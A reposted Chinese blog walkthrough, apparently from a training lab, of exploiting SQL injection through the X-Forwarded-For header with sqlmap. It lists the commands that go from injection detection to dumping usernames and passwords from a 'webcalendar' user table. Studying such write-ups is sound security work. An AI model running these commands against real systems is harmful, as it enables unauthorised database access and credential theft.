爆库记录（X-Forwarded-For注入漏洞实战记录）

本文转载自查看原文 2019-09-15 14:59 453 SQLmap

获取登陆地址的请求信息

往请求头信息加入X-Forwarded-For:*

一起写入保存到本地txt文件 123.txt

执行sqlmap

搜索看有没有漏洞

sqlmap.py -r /Users/lucax/Desktop/123.txt

出现:（存在可以注入）

获取当前用户权限

sqlmap.py -r /Users/lucax/Desktop/123.txt --current-user

获取当前数据库库名

sqlmap.py -r /Users/lucax/Desktop/123.txt --dbs

获取数据库表名

sqlmap.py -r /Users/lucax/Desktop/123.txt -D webcalendar --tables

获取表里面的字段名

sqlmap.py -r /Users/lucax/Desktop/123.txt -D webcalendar -T user --columns

获取字段对应的值

sqlmap.py -r /Users/lucax/Desktop/123.txt -D webcalendar -T user -C id,username,password --dump

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 X-Forwarded-For注入漏洞过程记录 X-Forwarded-For注入漏洞 [ 墨者学院 ] SQL注入 —— X-Forwarded-For注入漏洞实战 IIS日志如何记录X-Forwarded-For sqlmap使用和X-Forwarded-For注入漏洞测试 tomcat记录X-Forwarded-For字段中的远程IP X-Forwarded-For (IIS日志记录用户真实IP) HTTP头注入漏洞测试(X-Forwarded-for)--手动注入 CTF—攻防练习之HTTP—SQL注入(X-forwarded-For) X-Forwarded-For和Referer